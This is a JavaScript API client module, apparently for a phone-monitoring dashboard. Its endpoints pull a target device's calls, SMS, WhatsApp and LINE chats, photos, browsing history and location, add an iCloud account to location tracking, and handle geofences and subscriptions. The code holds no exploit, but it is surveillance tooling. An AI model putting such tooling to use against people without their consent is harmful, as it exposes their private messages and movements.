import qs from 'qs'
import axios from '/src/utils/request'
import { readLocalDeviceUdid } from 'src/utils/readAndroidLocalContext'

/**
 * 合并 device_id 到 options 中
 * @param {any} options
 * @returns
 */
const mergeDeviceIdtoOptions = options => {
  // 1. 如果 options 不存在，则创建一个空对象
  // 2. 如果 options 中已经存在 device_id，则直接返回 options
  // 3. 如果 options 中不存在 device_id，则从 localStorage 中获取当前设备的 device_id，并合并到 options 中返回
  // 4. 如果 localStorage 中也不存在当前设备的 device_id，则直接返回 options
  if (!options) {
    options = {}
  }

  if (options.device_id) return options

  const currentDevice = JSON.parse(localStorage.getItem('DeviceUser'))
  const device_id = currentDevice?.device_id
  if (device_id) {
    return { ...options, device_id }
  }

  return options
}

// 拨号历史
const getCallHistory = options => axios.post('/api/dashboard/call-history', mergeDeviceIdtoOptions(options))

// 联系人
const getContact = options => axios.post('/api/dashboard/contact', mergeDeviceIdtoOptions(options))

// 短信
const getSmsChatSummary = options => axios.post('/api/dashboard/smsChat-summary', mergeDeviceIdtoOptions(options))

// 短信详情
const getSmsChatDetail = options => axios.post('/api/dashboard/sms-chat-detail', mergeDeviceIdtoOptions(options))

// 提醒
const getReminderSummary = options => axios.post('/api/dashboard/reminder-summary', mergeDeviceIdtoOptions(options))

// 提醒详情

const getReminderDetail = options => axios.post('/api/dashboard/reminder-detail', mergeDeviceIdtoOptions(options))

// 照片
const getPhotoObject = options => axios.post('/api/dashboard/photo-object', mergeDeviceIdtoOptions(options))

// wifi
const getWifi = (options, config) => axios.post('/api/dashboard/wifi', mergeDeviceIdtoOptions(options), config)

// 文件夹
const getAlbumSummary = options => axios.post('/api/dashboard/album-summary', mergeDeviceIdtoOptions(options))

// 文件夹详情
const getAlbumDetail = options => axios.post('/api/dashboard/album-detail', mergeDeviceIdtoOptions(options))

// 已安装app
const getInstalledApp = options => axios.post('/api/dashboard/installed-app', mergeDeviceIdtoOptions(options))

// 获取日历
const getCalendar = options => axios.post('/api/dashboard/calendar', mergeDeviceIdtoOptions(options))

// 获取笔记
const getNotes = options => axios.post('/api/dashboard/note', mergeDeviceIdtoOptions(options))

// 浏览器历史
const getSafariHistory = options => axios.post('/api/dashboard/safari-history', mergeDeviceIdtoOptions(options))

// 浏览器书签
const getSafariBookmark = options => axios.post('/api/dashboard/safari-bookmark', mergeDeviceIdtoOptions(options))

// 定位
const getLocation = (options, config) => axios.post('/api/dashboard/location', mergeDeviceIdtoOptions(options), config)

// whatsapp列表
const getWhatsappChatSummary = options =>
  axios.post('/api/dashboard/whatsapp-chat-summary', mergeDeviceIdtoOptions(options))

// whatsapp info
const getWhatsappChatDetail = options =>
  axios.post('/api/dashboard/whatsapp-chat-detail', mergeDeviceIdtoOptions(options))

// 获取设备列表
const getBackupDeviceList = (options, config) =>
  axios.post('/api/dashboard/backup-device-list', mergeDeviceIdtoOptions(options), config)

// 获取目录文件
const getDriveDir = options => axios.post('/api/dashboard/drive-dir', mergeDeviceIdtoOptions(options))

// 重置
const resetIcloud = options => axios.post('/api/dashboard/reset', mergeDeviceIdtoOptions(options))

// line聊天列表
const getLineChatSummary = options => axios.post('/api/dashboard/line-chat-summary', mergeDeviceIdtoOptions(options))

// line聊天详情
const getLineChatDetail = options => axios.post('/api/dashboard/line-chat-detail', mergeDeviceIdtoOptions(options))

// 把iCloud账号添加到地理位置服务队列
const fmip = options => axios.post('/api/dashboard/fmip', mergeDeviceIdtoOptions(options))

// 获取数据
const getAllDashboard = options => axios.post('/api/dashboard/auth/all', mergeDeviceIdtoOptions(options))

// 检查优惠价
const checkCoupon = options => axios.post('/api/user/coupon', options)

// 模拟数据
const mock = options => axios.post('/api/dashboard/mock', options)

// --------------------------------- gcloud开始 ------------------------
const getGcloudAll = (options, config) => axios.post('/api/gcloud/dashboard/auth/all', options, config)

//  whatsapp验证

const androidWaKey = options => axios.post('/api/gcloud/dashboard/wa/key', options)

// local-android
const withLocalAndroidDeviceUdid = options => {
  const requestOptions = options && typeof options === 'object' ? options : {}
  const params = requestOptions.params && typeof requestOptions.params === 'object' ? requestOptions.params : {}

  // DEVICE_LIST does not require a target device UDID.
  if (params.category === 'DEVICE_LIST') return requestOptions

  return {
    ...requestOptions,
    params: {
      ...params,
      deviceUdid: params.deviceUdid || readLocalDeviceUdid()
    }
  }
}

const getLocalAndroidAll = (options, config) =>
  axios.post('/api/localAndroid/dashboard/auth/all', withLocalAndroidDeviceUdid(options), config)

// 发送 geofence 信息
const createGeofenceInfo = options => axios.post('/api/geofencing', options)

// 获取 geofence 信息
const getGenofenceInfo = options => axios.get('/api/geofencing?' + qs.stringify(options))

// 更新 geofence 信息
const updateGenofenceInfo = options => axios.put('/api/geofencing', options)

// 删除 geofence 信息
const deleteGenofenceInfo = options => axios.delete('/api/geofencing?' + qs.stringify(options))

// 判断设备是否断开
const disconnectCheck = options => axios.post('/api/dashboard/adx/disconnect-check', options)

// 推荐计划
const recommendation = options => axios.get('/api/recommendation/id', options)

// 用户反馈
const suggestionBox = options => axios.post('/api/user-feedback/content', options)

// 清除数据
const clearAccountData = options => axios.post('/api/device/clear-data', options)

// 延长订阅
const extendSubscriptionTime = options => axios.post('/api/payment/common/renew', options)

// currentDeviceInfo
const currentDeviceInfo = options => axios.post('/api/device/device-find-order', options)

// 删除 视频/音频/截图
const delFile = options => axios.post('/api/dashboard/adx/database/delete', options)

// 页面报错上传
const errorPageUpload = options => axios.post('/api/user-analytic/dashboard/page/err/log', options)

// 获取用户订阅信息
const getPaymentInfo = options => axios.get('/api/product/device-by-product', options)

// 按订单查续费/新单产品；不传 order_id 时后端返回新买产品（全部超 30 天场景）
const getPlansByOrder = options => axios.get('/api/product/plans-by-order', { params: options })

/**
 * 查询当前登录账号是否具备首次手动续费优惠展示资格（账号级，不绑定具体订单，也不判断过期时间）。
 * discount_rate 仅用于符合条件订单的角标/横幅展示，不参与套餐金额计算；套餐价格以 plans-by-order 返回值为准。
 */
const getManualRenewEligible = () => axios.get('/api/product/manual-renew-eligible')

// 升级服务直接付款接口
const upgradePayment = options => axios.post('/api/payment/common/upgrade', options)

// 埋点上报
const bindTrackingAdd = options => axios.post('/api/bind-tracking/add', options)

const userBrowsePath = options => axios.post('/api/user-browse-path', options)

// 获取收藏的菜单功能
const getMenuFavorite = device_id => axios.get('/api/device-menu-favorite', { params: { device_id } })

// 添加取消收藏的菜单功能
const postMenuFavorite = options => axios.post('/api/device-menu-favorite', options)

export {
  getCallHistory,
  getContact,
  getSmsChatSummary,
  getSmsChatDetail,
  getReminderSummary,
  getReminderDetail,
  getPhotoObject,
  getWifi,
  getAlbumSummary,
  getAlbumDetail,
  getInstalledApp,
  getCalendar,
  getNotes,
  getSafariHistory,
  getSafariBookmark,
  getLocation,
  getWhatsappChatSummary,
  getWhatsappChatDetail,
  getBackupDeviceList,
  getDriveDir,
  resetIcloud,
  getLineChatSummary,
  getLineChatDetail,
  fmip,
  getAllDashboard,
  checkCoupon,
  mock,
  getGcloudAll,
  androidWaKey,
  getLocalAndroidAll,
  createGeofenceInfo,
  getGenofenceInfo,
  updateGenofenceInfo,
  deleteGenofenceInfo,
  disconnectCheck,
  recommendation,
  suggestionBox,
  clearAccountData,
  extendSubscriptionTime,
  currentDeviceInfo,
  delFile,
  errorPageUpload,
  getPaymentInfo,
  getPlansByOrder,
  getManualRenewEligible,
  upgradePayment,
  bindTrackingAdd,
  userBrowsePath,
  getMenuFavorite,
  postMenuFavorite
}
